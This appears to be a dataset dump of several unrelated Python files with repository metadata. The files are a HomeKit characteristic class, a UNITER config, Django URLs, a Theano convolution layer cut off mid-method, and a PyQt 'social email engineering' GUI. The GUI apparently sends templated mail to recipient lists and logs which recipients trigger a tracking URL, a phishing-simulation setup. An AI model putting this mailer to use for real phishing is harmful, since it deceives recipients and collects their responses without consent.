{k: self.properties[k] for k in self.properties.keys() & PROP_NUMERIC}
)
if PROP_VALID_VALUES in self.properties:
hap_rep[HAP_REPR_VALID_VALUES] = sorted(
self.properties[PROP_VALID_VALUES].values()
)
elif self.properties[PROP_FORMAT] == HAP_FORMAT_STRING:
if len(value) > 64:
hap_rep[HAP_REPR_MAX_LEN] = min(len(value), 256)
if HAP_PERMISSION_READ in self.properties[PROP_PERMISSIONS]:
hap_rep[HAP_REPR_VALUE] = value
return hap_rep
@classmethod
def from_dict(cls, name, json_dict, from_loader=False):
"""Initialize a characteristic object from a dict.
:param json_dict: Dictionary containing at least the keys `Format`,
`Permissions` and `UUID`
:type json_dict: dict
"""
type_id = hap_type_to_uuid(json_dict.pop("UUID"))
char = cls(name, type_id, properties=json_dict)
if from_loader:
char._loader_display_name = ( # pylint: disable=protected-access
char.display_name
)
return char
| 33.099042
| 86
| 0.643629
| 1,285
| 10,360
| 4.927626
| 0.182101
| 0.055433
| 0.036955
| 0.026532
| 0.173405
| 0.139135
| 0.098389
| 0.050221
| 0.023057
| 0.023057
| 0
| 0.006104
| 0.272587
| 10,360
| 312
| 87
| 33.205128
| 0.83413
| 0.28195
| 0
| 0.074866
| 0
| 0
| 0.072639
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.016043
| 0
| 0.128342
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8693c080676cb2787d00c99c4612bc9e39e2bff8
| 1,767
|
py
|
Python
|
configs/_base_/datasets/uniter/vqa_dataset_uniter.py
|
linxi1158/iMIX
|
af87a17275f02c94932bb2e29f132a84db812002
|
[
"Apache-2.0"
] | 23
|
2021-06-26T08:45:19.000Z
|
2022-03-02T02:13:33.000Z
|
configs/_base_/datasets/uniter/vqa_dataset_uniter.py
|
XChuanLee/iMIX
|
99898de97ef8b45462ca1d6bf2542e423a73d769
|
[
"Apache-2.0"
] | null | null | null |
configs/_base_/datasets/uniter/vqa_dataset_uniter.py
|
XChuanLee/iMIX
|
99898de97ef8b45462ca1d6bf2542e423a73d769
|
[
"Apache-2.0"
] | 9
|
2021-06-10T02:36:20.000Z
|
2021-11-09T02:18:16.000Z
|
dataset_type = 'UNITER_VqaDataset'
data_root = '/home/datasets/mix_data/UNITER/VQA/'
train_datasets = ['train']
test_datasets = ['minival'] # name not in use, but have defined one to run
vqa_cfg = dict(
train_txt_dbs=[
data_root + 'vqa_train.db',
data_root + 'vqa_trainval.db',
data_root + 'vqa_vg.db',
],
train_img_dbs=[
data_root + 'coco_train2014/',
data_root + 'coco_val2014',
data_root + 'vg/',
],
val_txt_db=data_root + 'vqa_devval.db',
val_img_db=data_root + 'coco_val2014/',
ans2label_file=data_root + 'ans2label.json',
max_txt_len=60,
conf_th=0.2,
max_bb=100,
min_bb=10,
num_bb=36,
train_batch_size=20480, # 5120,
val_batch_size=40960, # 10240,
)
BUCKET_SIZE = 8192
train_data = dict(
samples_per_gpu=vqa_cfg['train_batch_size'],
workers_per_gpu=4,
pin_memory=True,
batch_sampler=dict(
type='TokenBucketSampler',
bucket_size=BUCKET_SIZE,
batch_size=vqa_cfg['train_batch_size'],
drop_last=True,
size_multiple=8,
),
data=dict(
type=dataset_type,
datacfg=vqa_cfg,
train_or_val=True,
),
)
test_data = dict(
samples_per_gpu=vqa_cfg['val_batch_size'],
workers_per_gpu=4,
batch_sampler=dict(
type='TokenBucketSampler',
bucket_size=BUCKET_SIZE,
batch_size=vqa_cfg['val_batch_size'],
drop_last=False,
size_multiple=8,
),
pin_memory=True,
data=dict(
type=dataset_type,
datacfg=vqa_cfg,
train_or_val=False,
),
)
post_processor = dict(
type='Evaluator',
metrics=[dict(type='UNITER_AccuracyMetric')],
dataset_converters=[dict(type='UNITER_DatasetConverter')],
)
| 24.205479
| 75
| 0.63837
| 234
| 1,767
| 4.431624
| 0.358974
| 0.077146
| 0.04243
| 0.037608
| 0.358727
| 0.32594
| 0.281581
| 0.229508
| 0.229508
| 0.229508
| 0
| 0.038777
| 0.241087
| 1,767
| 72
| 76
| 24.541667
| 0.734526
| 0.032258
| 0
| 0.363636
| 0
| 0
| 0.186987
| 0.046307
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869425b882c792777c4c9df4c4e4ede390b45006
| 752
|
py
|
Python
|
students/k3340/laboratory_works/laboratory_works/Arlakov_Denis/laboratiry_work_2_and_3/lab/django-react-ecommerce-master/home/urls.py
|
TonikX/ITMO_ICT_-WebProgramming_2020
|
ba566c1b3ab04585665c69860b713741906935a0
|
[
"MIT"
] | 10
|
2020-03-20T09:06:12.000Z
|
2021-07-27T13:06:02.000Z
|
students/k3340/laboratory_works/laboratory_works/Arlakov_Denis/laboratiry_work_2_and_3/lab/django-react-ecommerce-master/home/urls.py
|
TonikX/ITMO_ICT_-WebProgramming_2020
|
ba566c1b3ab04585665c69860b713741906935a0
|
[
"MIT"
] | 134
|
2020-03-23T09:47:48.000Z
|
2022-03-12T01:05:19.000Z
|
students/k3340/laboratory_works/laboratory_works/Arlakov_Denis/laboratiry_work_2_and_3/lab/django-react-ecommerce-master/home/urls.py
|
TonikX/ITMO_ICT_-WebProgramming_2020
|
ba566c1b3ab04585665c69860b713741906935a0
|
[
"MIT"
] | 71
|
2020-03-20T12:45:56.000Z
|
2021-10-31T19:22:25.000Z
|
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic import TemplateView
urlpatterns = [
path('api-auth/', include('rest_framework.urls')),
path('rest-auth/', include('rest_auth.urls')),
path('rest-auth/registration/', include('rest_auth.registration.urls')),
path('admin/', admin.site.urls),
path('api/', include('core.api.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
if not settings.DEBUG:
urlpatterns += [re_path(r'^.*',
TemplateView.as_view(template_name='index.html'))]
| 32.695652
| 78
| 0.678191
| 94
| 752
| 5.319149
| 0.393617
| 0.1
| 0.056
| 0.064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.179521
| 752
| 22
| 79
| 34.181818
| 0.810373
| 0
| 0
| 0
| 0
| 0
| 0.183511
| 0.066489
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.277778
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869447ef2f6a217e512b23fd0c00a4c4fa0f87a0
| 22,881
|
py
|
Python
|
20200416_Socialmail/mailserverUi.py
|
karta1782310/python-docx-automated-report-generation
|
f0e02a50a9e9547d131e583be0711aad72f08b51
|
[
"MIT"
] | null | null | null |
20200416_Socialmail/mailserverUi.py
|
karta1782310/python-docx-automated-report-generation
|
f0e02a50a9e9547d131e583be0711aad72f08b51
|
[
"MIT"
] | null | null | null |
20200416_Socialmail/mailserverUi.py
|
karta1782310/python-docx-automated-report-generation
|
f0e02a50a9e9547d131e583be0711aad72f08b51
|
[
"MIT"
] | null | null | null |
#!/bin/bash
# -*- coding: UTF-8 -*-
# 基本控件都在这里面
from PyQt5.QtWebEngineWidgets import QWebEngineView
from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog,
QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit,
QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView)
from PyQt5.QtGui import QPalette, QColor, QBrush
from PyQt5.QtCore import Qt, QDateTime
from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions
import qdarkstyle, sys
import mylibrary.genmail as gm
from GenAndSendMail import insert_send_mail
from server.database import Database
from server.sendmail import Smtp
from server.client import Client
from email import generator
from pandas import DataFrame
from copy import deepcopy
class SubWindow(QWidget):
def __init__(self):
super().__init__()
self.resize(400,100)
self.main_layout = QGridLayout()
self.setLayout(self.main_layout)
self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
self.main_layout.addWidget(QLabel('收件人'), 0, 0, 1, 1)
self.in_recipient = QLineEdit()
self.main_layout.addWidget(self.in_recipient, 0, 1, 1, 5)
self.btn_send = QPushButton('寄送')
self.main_layout.addWidget(self.btn_send, 1, 5, 1, 1)
class MailserverUi(QMainWindow):
def __init__(self):
super().__init__()
setConfigOption('background', '#19232D')
setConfigOption('foreground', 'd')
setConfigOptions(antialias = True)
# self.resize(720,500)
self.init_ui()
self.data_smtp = []
self.data_db = []
self.data_logs = []
self.data_temp_logs = []
# self.sub_win = SubWindow()
# 默認狀態欄
self.status = self.statusBar()
self.status.showMessage("開發者: 鄭鈺城, 聯絡資訊: anthonycheng@systex.com")
# 標題欄
self.setWindowTitle("社交郵件工程")
self.setWindowOpacity(1) # 窗口透明度
self.main_layout.setSpacing(0)
self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
self.main_widget.setStyleSheet(
"""
QComboBox::item:checked {
height: 12px;
border: 1px solid #32414B;
margin-top: 0px;
margin-bottom: 0px;
padding: 4px;
padding-left: 0px;
}
"""
)
def init_ui(self):
# 創建視窗主部件
self.main_widget = QWidget()
# 創建主部件的網格佈局
self.main_layout = QGridLayout()
# 設置窗口主部件佈局為網格佈局
self.main_widget.setLayout(self.main_layout)
# 創建左側部件
self.left_widget = QWidget()
self.left_widget.setObjectName('left_widget')
self.left_layout = QGridLayout()
self.left_widget.setLayout(self.left_layout)
# 創建右側部件
self.right_widget = QWidget()
self.right_widget.setObjectName('right_widget')
self.right_layout = QGridLayout()
self.right_widget.setLayout(self.right_layout)
# 左側部件在第0行第0列,佔12行3列
self.main_layout.addWidget(self.left_widget, 0, 0, 12, 3)
# 右側部件在第0行第3列,佔12行8列
self.main_layout.addWidget(self.right_widget, 0, 3, 12, 8)
# 設置視窗主部件
self.setCentralWidget(self.main_widget)
# 主要功能按鈕
self.btn_sendmail = QPushButton("發送信件")
self.btn_sendmail.clicked.connect(self.display_send_mail)
self.btn_smtp = QPushButton("系統設定")
self.btn_smtp.clicked.connect(self.display_smtp_setting)
self.btn_db = QPushButton("資料庫設定")
self.btn_db.clicked.connect(self.display_db_setting)
self.btn_update_eml = QPushButton("修改樣板")
self.btn_update_eml.clicked.connect(self.display_update_eml)
self.btn_get_logs = QPushButton("觸發明細")
self.btn_get_logs.clicked.connect(self.display_logs)
self.btn_download_logs = QPushButton("下載觸發明細")
self.btn_download_logs.clicked.connect(self.logs_download)
self.quit_btn = QPushButton("退出")
self.quit_btn.clicked.connect(self.quit_act)
self.left_layout.addWidget(self.btn_sendmail, 2, 0, 1, 3)
self.left_layout.addWidget(self.btn_smtp, 3, 0, 1, 3)
self.left_layout.addWidget(self.btn_db, 4, 0, 1, 3)
self.left_layout.addWidget(self.btn_update_eml, 5, 0, 1, 3)
self.left_layout.addWidget(self.btn_get_logs, 6, 0, 1, 3)
self.left_layout.addWidget(self.btn_download_logs, 7, 0, 1, 3)
self.left_layout.addWidget(self.quit_btn, 8, 0, 1, 3)
# 主要功能查詢
self.in_data = QLineEdit()
self.in_data.setPlaceholderText("暫無")
self.left_layout.addWidget(self.in_data, 1, 0, 1, 3)
# 主要功能 log
self.query_result = QTableWidget()
self.left_layout.addWidget(self.query_result, 9, 0, 2, 3)
self.query_result.verticalHeader().setVisible(False)
self.right_display = GraphicsLayoutWidget()
self.right_layout.addWidget(self.right_display, 0, 3, 12, 8)
# 右側物件: sendmail
self.in_eml_type = QLineEdit()
self.in_eml_template = QLineEdit()
self.btn_eml_browse = QPushButton('瀏覽')
self.btn_eml_browse.clicked.connect(lambda: self.open_eml(self.in_eml_template))
self.in_recipient_group = QLineEdit()
self.in_recipient_excel = QLineEdit()
self.btn_recipient_browse = QPushButton('瀏覽')
self.btn_recipient_browse.clicked.connect(lambda: self.open_excel(self.in_recipient_excel))
self.in_annex_file = QLineEdit()
self.btn_annex_file = QPushButton('瀏覽')
self.btn_annex_file.clicked.connect(lambda: self.open_word(self.in_annex_file))
self.in_scheduler = QDateTimeEdit(QDateTime.currentDateTime())
self.in_scheduler.setCalendarPopup(True)
self.in_scheduler.setDisplayFormat('yyyy-MM-dd hh:mm')
self.cb_scheduler = QCheckBox('使用')
self.btn_sendmail_start = QPushButton('執行')
self.btn_sendmail_start.clicked.connect(self.send_mail)
# 右側物件: smtp
self.in_smtp_host = QLineEdit()
self.in_smtp_port = QLineEdit()
self.in_smtp_user = QLineEdit()
self.in_smtp_password = QLineEdit()
self.cb_smtp_ssl = QCheckBox('使用')
self.in_smtp_test = QLineEdit()
self.btn_smtp_save = QPushButton('儲存')
self.btn_smtp_save.clicked.connect(lambda: self.save_data(self.data_smtp))
self.btn_smtp_test = QPushButton('測試')
self.btn_smtp_test.clicked.connect(self.show_sub_win)
# 右側物件: db
self.in_db_host = QLineEdit()
self.in_db_port = QLineEdit()
self.in_db_user = QLineEdit()
self.in_db_password = QLineEdit()
self.in_db_database = QLineEdit()
self.in_db_domain = QLineEdit()
self.in_db_domain.setPlaceholderText('回收風險資訊動作的網址')
self.btn_db_save = QPushButton('儲存')
self.btn_db_save.clicked.connect(lambda: self.save_data(self.data_db))
# 右側物件: update eml
self.in_edit_sender = QLineEdit()
self.in_edit_sender_name = QLineEdit()
self.cb_edit_annex = QCheckBox('是')
self.in_edit_annex = QLineEdit()
self.btn_edit_annex = QPushButton('瀏覽')
self.btn_edit_annex.clicked.connect(lambda: self.open_annex(self.in_edit_annex))
self.in_edit_subject = QLineEdit()
self.mail_tab = QTabWidget()
self.mail_tab.setDocumentMode(True)
self.mail_tab.currentChanged.connect(self.print_html)
self.mail_tab_1 = QWidget()
self.mail_tab_2 = QWidget()
self.mail_tab.addTab(self.mail_tab_1, 'Html')
self.mail_tab.addTab(self.mail_tab_2, 'Web')
self.tab_1 = QGridLayout()
self.tab_2 = QGridLayout()
self.tab_1.setContentsMargins(0,0,0,0)
self.tab_2.setContentsMargins(0,0,0,0)
self.mail_tab_1.setLayout(self.tab_1)
self.mail_tab_2.setLayout(self.tab_2)
self.in_edit_html = QTextEdit()
self.in_edit_web = QWebEngineView()
self.tab_1.addWidget(self.in_edit_html, 1, 1, 1, 1)
self.tab_2.addWidget(self.in_edit_web, 1, 1, 1, 1)
self.btn_edit_eml_reset = QPushButton('清除')
self.btn_edit_eml_reset.clicked.connect(self.eml_reset)
self.btn_edit_eml_read = QPushButton('讀取')
self.btn_edit_eml_read.clicked.connect(self.eml_open)
self.btn_edit_eml_save = QPushButton('儲存')
self.btn_edit_eml_save.clicked.connect(self.eml_save)
# 右側物件: logs
self.tbw_logs = QTableWidget()
self.tbw_logs.verticalHeader().setVisible(False)
self.cmb_logs_choice = QComboBox()
self.in_logs_data = QLineEdit()
self.in_logs_data.setPlaceholderText("輸入資料")
self.btn_logs_search = QPushButton('執行')
self.btn_logs_search.clicked.connect(self.logs_change)
def display_send_mail(self):
self.clear_layout(self.right_layout)
labels = [ "信件類型 :", "信件模板 :", " 收件人群組 :", "收件人資料 :", '附件資料 :',"設定排程 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_eml_type, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_eml_template, 1, 4, 1, 6)
self.right_layout.addWidget(self.btn_eml_browse, 1, 10, 1, 1)
self.right_layout.addWidget(self.in_recipient_group, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_recipient_excel, 3, 4, 1, 6)
self.right_layout.addWidget(self.btn_recipient_browse, 3, 10, 1, 1)
self.right_layout.addWidget(self.in_annex_file , 4, 4, 1, 6)
self.right_layout.addWidget(self.btn_annex_file, 4, 10, 1, 1)
self.right_layout.addWidget(self.in_scheduler, 5, 4, 1, 6)
self.right_layout.addWidget(self.cb_scheduler, 5, 10, 1, 1)
self.right_layout.addWidget(self.btn_sendmail_start, 6, 9, 1, 2)
def display_smtp_setting(self):
self.clear_layout(self.right_layout)
# 在右邊新增物件
labels = ["SMTP HOST :", "SMTP PORT :", "SMTP 帳號 :", "SMTP 密碼 :", "SMTP SSL :", " 測試信件內容 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_smtp_host, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_port, 1, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_user, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_password, 3, 4, 1, 7)
self.right_layout.addWidget(self.cb_smtp_ssl, 4, 4, 1, 7)
self.right_layout.addWidget(self.in_smtp_test, 5, 4, 1, 7)
self.right_layout.addWidget(self.btn_smtp_save, 6, 9, 1, 2)
self.right_layout.addWidget(self.btn_smtp_test, 6, 7, 1, 2)
def display_db_setting(self):
self.clear_layout(self.right_layout)
# 在右邊新增物件
labels = ["資料庫 HOST :", "資料庫 PORT :", "資料庫 帳號 :", "資料庫 密碼 :", "使用資料庫名稱 :", "回收網址 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_db_host, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_db_port, 1, 4, 1, 7)
self.right_layout.addWidget(self.in_db_user, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_db_password, 3, 4, 1, 7)
self.right_layout.addWidget(self.in_db_database, 4, 4, 1, 7)
self.right_layout.addWidget(self.in_db_domain, 5, 4, 1, 7)
self.right_layout.addWidget(self.btn_db_save, 6, 9, 1, 2)
def display_update_eml(self):
self.clear_layout(self.right_layout)
labels = ["寄件人 :", "寄件人名稱 :", " 是否加入附件 :", "附件名稱 :", "主旨 :", "內容 :"]
for i, label in enumerate(labels):
self.label = QLabel(label)
self.right_layout.addWidget(self.label, i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_edit_sender, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_edit_sender_name, 1, 4, 1, 7)
self.right_layout.addWidget(self.cb_edit_annex, 2, 4, 1, 7)
self.right_layout.addWidget(self.in_edit_annex, 3, 4, 1, 6)
self.right_layout.addWidget(self.btn_edit_annex, 3, 10, 1, 1)
self.right_layout.addWidget(self.in_edit_subject, 4, 4, 1, 7)
self.right_layout.addWidget(self.mail_tab, 5, 4, 6, 7)
self.right_layout.addWidget(self.btn_edit_eml_reset, 11, 5, 1, 2)
self.right_layout.addWidget(self.btn_edit_eml_read, 11, 7, 1, 2)
self.right_layout.addWidget(self.btn_edit_eml_save, 11, 9, 1, 2)
def display_logs(self):
self.data_temp_logs = []
self.tbw_logs.setRowCount(0)
self.clear_layout(self.right_layout)
self.right_layout.addWidget(self.tbw_logs, 1, 3, 11, 8)
self.right_layout.addWidget(QLabel('查詢 :'), 0, 3, 1, 1)
self.right_layout.addWidget(self.cmb_logs_choice, 0, 4, 1, 2)
self.right_layout.addWidget(self.in_logs_data, 0, 6, 1, 3)
self.right_layout.addWidget(self.btn_logs_search, 0, 9, 1, 2)
try:
db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db[:5] else Database()
self.data_logs = db.get_logs()
self.data_temp_logs = deepcopy(self.data_logs)
if self.data_logs:
row_num = len(self.data_logs)
col_num = len(self.data_logs[0])
col_lst = list(self.data_logs[0].keys())
self.cmb_logs_choice.clear()
self.cmb_logs_choice.addItems(col_lst)
self.tbw_logs.setRowCount(row_num)
self.tbw_logs.setColumnCount(col_num)
self.tbw_logs.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.tbw_logs.setHorizontalHeaderLabels(col_lst)
for i in range(row_num):
row_data = list(self.data_logs[i].values())
for j in range(col_num):
temp_data = row_data[j]
item = QTableWidgetItem(str(temp_data))
item.setForeground(QBrush(QColor(144, 182, 240)))
self.tbw_logs.setItem(i, j, item)
except:
QMessageBox.warning(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)
else:
db.__disconnect__()
def get_items_from_layout(self, layout):
return [layout.itemAt(i).widget() for i in range(layout.count())]
def save_data(self, data):
items = self.get_items_from_layout(self.right_layout)
data.clear()
try:
for item in items:
if type(item) == type(QLineEdit()):
data.append(item.text())
elif type(item) == type(QCheckBox()):
data.append(item.isChecked())
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
print(data)
def clear_layout(self, layout):
for i in reversed(range(layout.count())):
layout.itemAt(i).widget().setParent(None)
def open_eml(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)")
obj.setText(file_name)
def open_excel(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Excel Files (*.xlsx)")
obj.setText(file_name)
def open_word(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Word Files (*.doc *.docx)")
obj.setText(file_name)
def open_annex(self, obj):
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Annex Files (*.jpg *.png *.zip)")
org_files = obj.text()
all_files = org_files + ',' + file_name if org_files else file_name
obj.setText(all_files)
def print_html(self, index):
if index:
self.in_edit_web.setHtml(self.in_edit_html.toPlainText())
def send_mail(self):
eml_type = self.in_eml_type.text()
eml_file = self.in_eml_template.text()
user_group = self.in_recipient_group.text()
mail_excel = self.in_recipient_excel.text()
annex_file = self.in_annex_file.text()
url = self.data_db[5] if self.data_db else 'http://yumail.myvnc.com'
try:
if self.cb_scheduler.isChecked():
my_time = self.in_scheduler.text()+':00'
client = Client()
client.send(self.data_smtp[:4], self.data_db[:5], eml_type, eml_file, user_group, mail_excel, annex_file, url, my_time)
QMessageBox.information(self, 'Success!', '排程設定成功!', QMessageBox.Ok)
else:
sm = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) if self.data_smtp else Smtp()
db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db else Database()
insert_send_mail(eml_type, eml_file, user_group, mail_excel, sm, db, annex=annex_file, url=url)
sm.close()
db.__disconnect__()
QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)
def show_sub_win(self):
if self.data_smtp:
self.sub_win = SubWindow()
self.sub_win.btn_send.clicked.connect(self.send_test)
self.sub_win.show()
else:
QMessageBox.warning(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)
def send_test(self):
try:
if self.data_smtp:
mailserver = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3])
mail_msg = gm.gen_test_eml(['Test Email', '測試寄件人', self.data_smtp[2], self.sub_win.in_recipient.text()], self.data_smtp[5])
error = mailserver.send(mail_msg.as_string(), self.data_smtp[2], self.sub_win.in_recipient.text())
mailserver.close()
if error:
QMessageBox.warning(self, 'Warning!', '信件寄出成功!\nWaning: '+error, QMessageBox.Ok)
else:
QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)
self.sub_win.in_recipient.clear()
except:
QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)
def eml_open(self):
self.in_edit_html.clear()
file_name, _ = QFileDialog.getOpenFileName(self, "選取檔案", "./", "Eml Files (*.eml)")
if not file_name:
return
header, html = gm.get_msg(file_name)
self.in_edit_sender.setText(header[2])
self.in_edit_sender_name.setText(header[1])
self.in_edit_subject.setText(header[0])
self.in_edit_html.insertPlainText(html)
def eml_save(self):
header, msg = [], ''
header.append(self.in_edit_subject.text())
header.append(self.in_edit_sender_name.text())
header.append(self.in_edit_sender.text())
header.append('test@email.com')
annex_file = self.in_edit_annex.text().split(',')
html = self.in_edit_html.toPlainText()
if not any(header[:3]) or not html:
return
try:
msg = gm.gen_eml(header, html, annex_file) if self.cb_edit_annex.isChecked() else gm.gen_eml(header, html)
file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.eml)')
with open(file_path, 'w') as outfile:
gen = generator.Generator(outfile)
gen.flatten(msg)
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
def eml_reset(self):
items = self.get_items_from_layout(self.right_layout)
for item in items:
if type(item) == type(QLineEdit()):
item.clear()
self.cb_edit_annex.setChecked(False)
self.in_edit_html.clear()
def logs_change(self):
if not self.data_logs or not self.in_logs_data.text():
return
self.data_temp_logs = []
self.tbw_logs.setRowCount(0)
# header = {'郵件類型':'type', '郵件主旨':'subject', '使用者群組':'user_group', '使用者信箱':'user_email'}
condition = self.cmb_logs_choice.currentText()
content = self.in_logs_data.text()
row_num = len(self.data_logs)
col_num = len(self.data_logs[0])
# self.tbw_logs.setRowCount(row_num)
self.tbw_logs.setColumnCount(col_num)
for i in range(row_num):
switch = False
if condition == 'date' and content in str(self.data_logs[i][condition]):
switch = True
elif self.data_logs[i][condition] == content:
switch = True
if switch:
self.tbw_logs.insertRow(self.tbw_logs.rowCount())
row_data = list(self.data_logs[i].values())
self.data_temp_logs.append(self.data_logs[i])
for j in range(col_num):
temp_data = row_data[j]
item = QTableWidgetItem(str(temp_data))
item.setForeground(QBrush(QColor(144, 182, 240)))
self.tbw_logs.setItem(self.tbw_logs.rowCount()-1, j, item)
def logs_download(self):
if self.data_temp_logs:
try:
file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.xlsx)')
if not file_path:
return
df = DataFrame(self.data_temp_logs)
df.to_excel(file_path, index=False)
QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)
except:
QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
else:
QMessageBox.warning(self, "缺少資料", "請確認是否有資料可以下載", QMessageBox.Ok)
def quit_act(self):
# sender 是发送信号的对象
sender = self.sender()
print(sender.text() + '键被按下')
qApp = QApplication.instance()
qApp.quit()
def main():
app = QApplication(sys.argv)
gui = MailserverUi()
gui.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| 41.75365
| 151
| 0.617193
| 2,943
| 22,881
| 4.561332
| 0.133877
| 0.036651
| 0.077846
| 0.082241
| 0.445694
| 0.357122
| 0.330676
| 0.303784
| 0.248063
| 0.1802
| 0
| 0.022542
| 0.261309
| 22,881
| 548
| 152
| 41.75365
| 0.771625
| 0.019405
| 0
| 0.221957
| 0
| 0
| 0.04008
| 0.001039
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062053
| false
| 0.009547
| 0.033413
| 0.002387
| 0.112172
| 0.009547
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86947b6782d353d9c52f3c8165971a18131a9c5c
| 3,869
|
py
|
Python
|
nntools/layers/corrmm.py
|
317070/nntools
|
00e2865b1f8246254b3adc22c37989a8b77718d5
|
[
"MIT"
] | null | null | null |
nntools/layers/corrmm.py
|
317070/nntools
|
00e2865b1f8246254b3adc22c37989a8b77718d5
|
[
"MIT"
] | null | null | null |
nntools/layers/corrmm.py
|
317070/nntools
|
00e2865b1f8246254b3adc22c37989a8b77718d5
|
[
"MIT"
] | null | null | null |
"""
GpuCorrMM-based convolutional layers
"""
import numpy as np
import theano
import theano.tensor as T
from theano.sandbox.cuda.basic_ops import gpu_contiguous
from theano.sandbox.cuda.blas import GpuCorrMM
from .. import init
from .. import nonlinearities
from . import base
# base class for all layers that rely on GpuCorrMM directly
class MMLayer(base.Layer):
pass
class Conv2DMMLayer(MMLayer):
def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False,
W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None,
flip_filters=False):
super(Conv2DMMLayer, self).__init__(input_layer)
if nonlinearity is None:
self.nonlinearity = nonlinearities.identity
else:
self.nonlinearity = nonlinearity
self.num_filters = num_filters
self.filter_size = filter_size
self.strides = strides
self.untie_biases = untie_biases
self.flip_filters = flip_filters
if border_mode is not None and pad is not None:
raise RuntimeError("You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.")
elif border_mode is None and pad is None:
# no option specified, default to valid mode
self.pad = (0, 0)
elif border_mode is not None:
if border_mode == 'valid':
self.pad = (0, 0)
elif border_mode == 'full':
self.pad = (self.filter_size[0] - 1, self.filter_size[1] -1)
elif border_mode == 'same':
